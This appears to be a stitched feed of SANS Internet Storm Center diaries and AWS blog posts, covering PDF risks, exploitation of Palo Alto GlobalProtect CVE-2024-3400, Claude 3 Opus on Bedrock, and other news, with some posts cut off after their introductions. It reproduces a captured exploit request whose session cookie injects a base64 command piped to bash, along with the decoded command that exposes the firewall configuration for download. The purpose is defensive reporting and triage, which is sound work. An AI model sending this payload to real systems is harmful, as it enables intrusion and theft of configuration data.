Billions of PDF files are exchanged daily, and many people trust them because they think the file is "read-only" and contains just "a bunch of data". In the past, badly crafted PDF files could trigger nasty vulnerabilities in PDF viewers. All of them were affected at least once, especially the Acrobat and Foxit readers. A PDF file can also be pretty "dynamic" and embed JavaScript, an auto-open action that triggers the execution of a script (for example, PowerShell on Windows), or any other type of embedded data.
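As a rough illustration of the "dynamic" features mentioned above, the sketch below counts PDF names that usually accompany scripts, auto-open actions, and embedded files. The list of names and the function `countSuspiciousNames` are assumptions made for this example, not a complete detection method: names hidden inside compressed object streams or written with hex escapes will be missed.

```javascript
// PDF names commonly associated with active or embedded content (illustrative list).
const SUSPICIOUS_NAMES = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"];

// Count how often each name appears in the raw bytes of a PDF.
// Naive on purpose: it does not decompress streams or decode #xx hex escapes.
function countSuspiciousNames(pdfBytes) {
  // latin1 maps every byte to exactly one character, so binary data is preserved.
  const text = Buffer.from(pdfBytes).toString("latin1");
  const counts = {};
  for (const name of SUSPICIOUS_NAMES) {
    // The lookahead keeps "/JS" from matching a longer name such as "/JSON".
    const pattern = new RegExp(name + "(?![A-Za-z0-9])", "g");
    counts[name] = (text.match(pattern) || []).length;
  }
  return counts;
}

// Hypothetical, hand-written PDF fragment used only to exercise the function.
const samplePdf = Buffer.from(
  "%PDF-1.7\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n" +
  "2 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n",
  "latin1"
);
console.log(countSuspiciousNames(samplePdf));
```

A non-zero count is only a hint that the file deserves a closer look with a dedicated PDF analysis tool.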

Palo Alto Networks GlobalProtect exploit public and widely exploited CVE-2024-3400, (Tue, Apr 16th)

The Palo Alto Networks vulnerability has been analyzed in depth by various sources, and exploits are now public [1].

We have gotten several reports of exploits being attempted against GlobalProtect installs. In addition, we see scans for the GlobalProtect login page, but these scans predated the exploit. VPN gateways have always been the target of attacks like brute forcing or credential stuffing.

GET /global-protect/login.esp HTTP/1.1
Host: [redacted]
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: SESSID=.././.././.././.././.././.././.././.././../opt/panlogs/tmp/device_telemetry/minute/'}|{echo,Y3AgL29wdC9wYW5jZmcvbWdtdC9zYXZlZC1jb25maWdzL3J1bm5pbmctY29uZmlnLnhtbCAvdmFyL2FwcHdlYi9zc2x2cG5kb2NzL2dsb2JhbC1wcm90ZWN0L2Rrc2hka2Vpc3NpZGpleXVrZGwuY3Nz}|{base64,-d}|bash|{'

The exploit abuses a path traversal vulnerability. The value of the session ID ("SESSID" cookie) is used to create a file. The traversal lets the attacker place that file in a telemetry directory, where the injected payload will be executed (see the watchTowr blog [1] for more details).

In this case, the code decoded to:

cp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/dkshdkeissidjeyukdl.css

This copy makes the "running-config.xml" file available for download without authentication. You may want to check the "/var/appweb/sslvpndocs/global-protect/" folder for similar files. I modified the random file name in case it was specific to the target from which we received this example.
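The decoding step can be reproduced with a few lines of Node.js. This is a minimal sketch for triaging logged cookies, assuming the payload follows the same `{echo,<base64>}|{base64,-d}` pattern as the request above; the function names `decodeEchoPayload` and `hasPathTraversal` are made up for this example, and other exploit variants may look different.

```javascript
// Extract the base64 blob from a "{echo,<base64>}" fragment and decode it.
// Returns null when the cookie value does not contain that pattern.
function decodeEchoPayload(cookieValue) {
  const match = /\{echo,([A-Za-z0-9+/=]+)\}/.exec(cookieValue);
  if (!match) return null;
  return Buffer.from(match[1], "base64").toString("utf8");
}

// Flag cookie values that contain a directory traversal sequence.
function hasPathTraversal(cookieValue) {
  return cookieValue.includes("../");
}

// SESSID value taken from the request shown in this diary.
const sessid =
  ".././.././.././.././.././.././.././.././../opt/panlogs/tmp/device_telemetry/minute/'}|{echo," +
  "Y3AgL29wdC9wYW5jZmcvbWdtdC9zYXZlZC1jb25maWdzL3J1bm5pbmctY29uZmlnLnhtbCAvdmFyL2FwcHdlYi9zc2x2cG5kb2NzL2dsb2JhbC1wcm90ZWN0L2Rrc2hka2Vpc3NpZGpleXVrZGwuY3Nz" +
  "}|{base64,-d}|bash|{'";

console.log(hasPathTraversal(sessid)); // true
console.log(decodeEchoPayload(sessid));
```

Decoding only inspects the payload; nothing is executed, so this is safe to run against captured requests.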

[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

—

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Anthropic’s Claude 3 Opus model is now available on Amazon Bedrock

We are living in the generative artificial intelligence (AI) era, a time of rapid innovation. When Anthropic announced its Claude 3 foundation models (FMs) on March 4, we made Claude 3 Sonnet, a model balanced between skills and speed, available on Amazon Bedrock the same day. On March 13, we launched the Claude 3 Haiku model on Amazon Bedrock, the fastest and most compact member of the Claude 3 family for near-instant responsiveness.

Today, we are announcing the availability of Anthropic’s Claude 3 Opus on Amazon Bedrock, the most intelligent Claude 3 model, with best-in-market performance on highly complex tasks. It can navigate open-ended prompts and sight-unseen scenarios with remarkable fluency and human-like understanding, leading the frontier of general intelligence.

With the availability of Claude 3 Opus on Amazon Bedrock, enterprises can build generative AI applications to automate tasks, generate revenue through user-facing applications, conduct complex financial forecasts, and accelerate research and development across various sectors. Like the rest of the Claude 3 family, Opus can process images and return text outputs.

Claude 3 Opus shows an estimated twofold gain in accuracy over Claude 2.1 on difficult open-ended questions, reducing the likelihood of faulty responses. As enterprise customers rely on Claude across industries like healthcare, finance, and legal research, improved accuracy is essential for safety and performance.

How does Claude 3 Opus perform?



Claude 3 Opus outperforms its peers on most of the common evaluation benchmarks for AI systems, including undergraduate-level expert knowledge (MMLU), graduate-level expert reasoning (GPQA), basic mathematics (GSM8K), and more. It exhibits high levels of comprehension and fluency on complex tasks, leading the frontier of general intelligence.

Source: https://www.anthropic.com/news/claude-3-family

Here are a few supported use cases for the Claude 3 Opus model:

- Task automation: planning and execution of complex actions across APIs, databases, and interactive coding

- Research: brainstorming and hypothesis generation, research review, and drug discovery

- Strategy: advanced analysis of charts and graphs, financials and market trends, and forecasting

To learn more about Claude 3 Opus’s features and capabilities, visit Anthropic’s Claude on Bedrock page and Anthropic Claude models in the Amazon Bedrock documentation.

Claude 3 Opus in action



If you are new to using Anthropic models, go to the Amazon Bedrock console and choose Model access on the bottom left pane. Request access separately for Claude 3 Opus.







To test Claude 3 Opus in the console, choose Text or Chat under Playgrounds in the left menu pane. Then choose Select model and select Anthropic as the category and Claude 3 Opus as the model.



To test more Claude prompt examples, choose Load examples. You can view and run examples specific to Claude 3 Opus, such as analyzing a quarterly report, building a website, and creating a side-scrolling game.

By choosing View API request, you can also access the model using code examples in the AWS Command Line Interface (AWS CLI) and AWS SDKs. Here is a sample of the AWS CLI command:

aws bedrock-runtime invoke-model \
  --model-id anthropic.claude-3-opus-20240229-v1:0 \
  --body "{\"messages\":[{\"role\":\"user\",\"content\":[{\"type\":\"text\",\"text\":\" Your task is to create a one-page website for an online learning platform.\\n\"}]}],\"anthropic_version\":\"bedrock-2023-05-31\",\"max_tokens\":2000,\"temperature\":1,\"top_k\":250,\"top_p\":0.999,\"stop_sequences\":[\"\\n\\nHuman:\"]}" \
  --cli-binary-format raw-in-base64-out \
  --region us-east-1 \
  invoke-model-output.txt

As I mentioned in my previous Claude 3 model launch posts, you need to use the new Anthropic Claude Messages API format for some Claude 3 model features, such as image processing. If you use Anthropic Claude Text Completions API and want to use Claude 3 models, you should upgrade from the Text Completions API.

My colleagues, Dennis Traub and Francois Bouteruche, are building code examples for Amazon Bedrock using AWS SDKs. You can learn how to invoke Claude 3 on Amazon Bedrock to generate text or multimodal prompts for image analysis in the Amazon Bedrock documentation.
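For image analysis, the Messages API takes an image content block next to the text block. The sketch below only builds such a payload and does not call Bedrock; the helper name `buildImagePayload` and the sample bytes are made up for illustration, and the payload would be passed as the `body` of an `InvokeModelCommand`, as in the text sample that follows.

```javascript
// Build a Messages API payload that pairs one image with a text question.
// imageBytes: Buffer or Uint8Array with the raw image data.
// mediaType: MIME type of the image, for example "image/png" or "image/jpeg".
function buildImagePayload(imageBytes, mediaType, question, maxTokens = 1000) {
  return {
    anthropic_version: "bedrock-2023-05-31",
    max_tokens: maxTokens,
    messages: [{
      role: "user",
      content: [
        {
          type: "image",
          source: {
            type: "base64",
            media_type: mediaType,
            // The API expects the image as a base64-encoded string.
            data: Buffer.from(imageBytes).toString("base64")
          }
        },
        { type: "text", text: question }
      ]
    }]
  };
}

// Placeholder bytes stand in for a real image file read from disk.
const demoPayload = buildImagePayload(Buffer.from([1, 2, 3]), "image/png", "What is in this image?");
console.log(JSON.stringify(demoPayload, null, 2));
```

Keeping payload construction in a separate function makes it easy to inspect the JSON before sending it to the model.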

Here is sample JavaScript code to send a Messages API request to generate text:

// claude_opus.js - Invokes Anthropic Claude 3 Opus using the Messages API.
import {
  BedrockRuntimeClient,
  InvokeModelCommand
} from "@aws-sdk/client-bedrock-runtime";

const modelId = "anthropic.claude-3-opus-20240229-v1:0";
const prompt = "Hello Claude, how are you today?";

// Create a new Bedrock Runtime client instance
const client = new BedrockRuntimeClient({ region: "us-east-1" });

// Prepare the payload for the model
const payload = {
  anthropic_version: "bedrock-2023-05-31",
  max_tokens: 1000,
  messages: [{
    role: "user",
    content: [{ type: "text", text: prompt }]
  }]
};

// Invoke Claude with the payload and wait for the response
const command = new InvokeModelCommand({
  contentType: "application/json",
  body: JSON.stringify(payload),
  modelId
});
const apiResponse = await client.send(command);

// Decode and print Claude's response
const decodedResponseBody = new TextDecoder().decode(apiResponse.body);
const responseBody = JSON.parse(decodedResponseBody);
const text = responseBody.content[0].text;
console.log(`Response: ${text}`);

Now, you can install the AWS SDK for JavaScript Runtime Client for Node.js and run claude_opus.js.

npm install @aws-sdk/client-bedrock-runtime
node claude_opus.js

For more examples in different programming languages, check out the code examples section in the Amazon Bedrock User Guide, and learn how to use system prompts with Anthropic Claude at Community.aws.

Now available

Claude 3 Opus is available today in the US West (Oregon) Region; check the full Region list for future updates.

Give Claude 3 Opus a try in the Amazon Bedrock console today and send feedback to AWS re:Post for Amazon Bedrock or through your usual AWS Support contacts.

— Channy

Rolling Back Packages on Ubuntu/Debian, (Tue, Apr 16th)

Package updates/upgrades by maintainers on the Linux platforms are always appreciated, as these updates are intended to offer new features/bug fixes. However, in rare circumstances, there is a need to downgrade the packages to a prior version due to unintended bugs or potential security issues, such as the recent xz-utils backdoor. Consistently backing up your data before significant updates is one good countermeasure against grief. However, what if one was not diligently practicing such measures and urgently needed to simply roll back to a prior version of the said package? I was recently put in this unenviable position when configuring one of my systems, and somehow, the latest version of Proton VPN (version 4.3.0) would not work and displayed the following output after I executed it:

Quick Palo Alto Networks Global Protect Vulnerability Update (CVE-2024-3400), (Mon, Apr 15th)

This is a quick update to our initial diary from this weekend [CVE-2024-3400].

At this point, we are not aware of a public exploit for this vulnerability. The widely shared GitHub exploit is almost certainly fake.

As promised, Palo Alto delivered a hotfix for affected versions on Sunday (close to midnight Eastern Time).

One of our readers, Mark, observed attacks attempting to exploit the vulnerability from two IP addresses:

173.255.223.159: An Akamai/Linode IP address. We do not have any reports from this IP address. Shodan suggests that the system may have recently hosted a WordPress site.

146.70.192.174: A system in Singapore that has been actively scanning various ports in March and April.

According to Mark, the countermeasure of disabling telemetry worked. The attacks were directed at various GlobalProtect installs, missing recently deployed instances. This could be due to the attacker using a slightly outdated target list.

Please let us know if you observe any additional attacks or if you come across exploits for this vulnerability.

—

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

AWS Weekly Roundup: New features on Knowledge Bases for Amazon Bedrock, OAC for Lambda function URL origins on Amazon CloudFront, and more (April 15, 2024)

AWS Community Days conferences are in full swing with AWS communities around the globe. The AWS Community Day Poland was hosted last week with more than 600 cloud enthusiasts in attendance. Community speakers Agnieszka Biernacka, Krzysztof Kąkol, and more, presented talks which captivated the audience and resulted in vibrant discussions throughout the day. My teammate, Wojtek Gawroński, was at the event and he’s already looking forward to attending again next year!

Last week’s launches

Here are some launches that got my attention during the previous week.

Amazon CloudFront now supports Origin Access Control (OAC) for Lambda function URL origins – Now you can protect your AWS Lambda URL origins by using Amazon CloudFront Origin Access Control (OAC) to only allow access from designated CloudFront distributions. The CloudFront Developer Guide has more details on how to get started using CloudFront OAC to authenticate access to Lambda function URLs from your designated CloudFront distributions.

AWS Client VPN and AWS Verified Access migration and interoperability patterns – If you’re using AWS Client VPN or a similar third-party VPN-based solution to provide secure access to your applications today, you’ll be pleased to know that you can now combine the use of AWS Client VPN and AWS Verified Access for your new or existing applications.

These two announcements related to Knowledge Bases for Amazon Bedrock caught my eye:

Metadata filtering to improve retrieval accuracy – With metadata filtering, you can retrieve not only semantically relevant chunks but a well-defined subset of those relevant chunks based on applied metadata filters and associated values.

Custom prompts for the RetrieveAndGenerate API and configuration of the maximum number of retrieved results – These are two new features that you can now choose as query options alongside the search type to give you control over the search results. The results are retrieved from the vector store and passed to the foundation model to generate the answer.
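To make the two query options more concrete, here is a sketch of a request object that combines a metadata filter with a cap on the number of retrieved results. It only builds the object. The field names reflect my understanding of the Retrieve operation in the Bedrock Agent Runtime API and should be checked against the documentation, and the knowledge base ID, metadata keys, and the helper `buildRetrieveRequest` are hypothetical.

```javascript
// Build the input for a knowledge base retrieval query.
// filter is optional; when omitted, only semantic relevance narrows the results.
function buildRetrieveRequest({ knowledgeBaseId, query, filter, maxResults = 5 }) {
  return {
    knowledgeBaseId,
    retrievalQuery: { text: query },
    retrievalConfiguration: {
      vectorSearchConfiguration: {
        // Upper bound on the number of chunks returned from the vector store
        numberOfResults: maxResults,
        ...(filter ? { filter } : {})
      }
    }
  };
}

// Hypothetical metadata: only finance documents newer than 2022.
const retrieveRequest = buildRetrieveRequest({
  knowledgeBaseId: "EXAMPLEKBID",
  query: "What was the revenue trend last quarter?",
  maxResults: 3,
  filter: {
    andAll: [
      { equals: { key: "department", value: "finance" } },
      { greaterThan: { key: "year", value: 2022 } }
    ]
  }
});
console.log(JSON.stringify(retrieveRequest, null, 2));
```

In a real application, an object like this would be handed to `RetrieveCommand` from `@aws-sdk/client-bedrock-agent-runtime`.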

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Other AWS news

AWS open source news and updates – My colleague Ricardo writes this weekly open source newsletter in which he highlights new open source projects, tools, and demos from the AWS Community.

Upcoming AWS events

AWS Summits – These are free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Whether you’re in the Americas, Asia Pacific & Japan, or EMEA region, learn here about future AWS Summit events happening in your area.

AWS Community Days – Join an AWS Community Day event just like the one I mentioned at the beginning of this post to participate in technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from your area. If you’re in Kenya or Nepal, there’s an event happening in your area this coming weekend.

You can browse all upcoming in-person and virtual events here.

That’s all for this week. Check back next Monday for another Weekly Roundup!

– Veliswa

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS.

Critical Palo Alto GlobalProtect Vulnerability Exploited (CVE-2024-3400), (Sat, Apr 13th)

On Friday, Palo Alto Networks released an advisory warning users of Palo Alto's Global Protect product of a vulnerability that has been exploited since March [1].

Volexity discovered the vulnerability after one of its customers was compromised [2]. The vulnerability allows for arbitrary code execution. As of today, an exploit has been made public on GitHub. I have not had a chance to test if the exploit is real. I doubt it is real, because I hope Palo Alto applied a bit more due diligence to its products than to let a trivial-to-exploit vulnerability slip in. On the other hand, we have seen similar vulnerabilities from security tool vendors before.

Assume Compromise

According to Volexity, exploit attempts for this vulnerability were observed as early as March 26th. A simple PoC is now publicly available.

Workarounds

GlobalProtect is only vulnerable if telemetry is enabled. Telemetry is enabled by default, but as a "quick fix", you may want to disable telemetry. Palo Alto Threat Prevention subscribers can enable Threat ID 95187 to block the exploit.

Patch

A patch should be available soon (it is not available as I am writing this). Check with Palo Alto for updates.

[1] https://security.paloaltonetworks.com/CVE-2024-3400

[2] https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400

—

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Building a Live SIFT USB with Persistence, (Fri, Apr 12th)

The SIFT Workstation[1] is a well-known Linux distribution oriented to forensics and incident response tasks. It is used in many SANS training courses as the default platform. This is also my preferred solution for my day-to-day DFIR activities. The distribution is available as a virtual machine, but you can also install it on top of a classic Ubuntu system. Today, everything is virtualized and most DFIR activities can be performed remotely with the provided VM but… sometimes you still need a way to perform local investigations against a physical computer. That's why I always carry a USB stick with me. Previously, I used Kali, which provides a standard solution.

Evolution of Artificial Intelligence Systems and Ensuring Trustworthiness, (Thu, Apr 11th)

We live in a dynamic age, especially with the increasing awareness and popularity of Artificial Intelligence (AI) systems being explored by users and organizations alike. I was recently quizzed by a junior researcher on how AI systems came about and realized I could not answer that query immediately. I had a rough idea of what led to the current generative and large language models. Still, I had a very fuzzy understanding of what transpired before them, besides being confident that neural networks were involved. Unsatisfied with the lack of appreciation of how AI systems evolved, I decided to explore how AI systems were conceptualized and developed to the current state, sharing what I learnt in this diary. However, knowing only how to use them but being unable to ensure their trustworthiness (especially if organizations want to use these systems for increasingly critical business activities) could expose organizations to a much higher risk than what senior leadership could accept. As such, I will also suggest some approaches (technical, governance, and philosophical) to ensure the trustworthiness of these AI systems.

April 2024 Microsoft Patch Tuesday Summary, (Tue, Apr 9th)

This update covers a total of 157 vulnerabilities. Seven of these vulnerabilities are Chromium vulnerabilities affecting Microsoft's Edge browser. However, only three of these vulnerabilities are considered critical. One of the vulnerabilities had already been disclosed and exploited.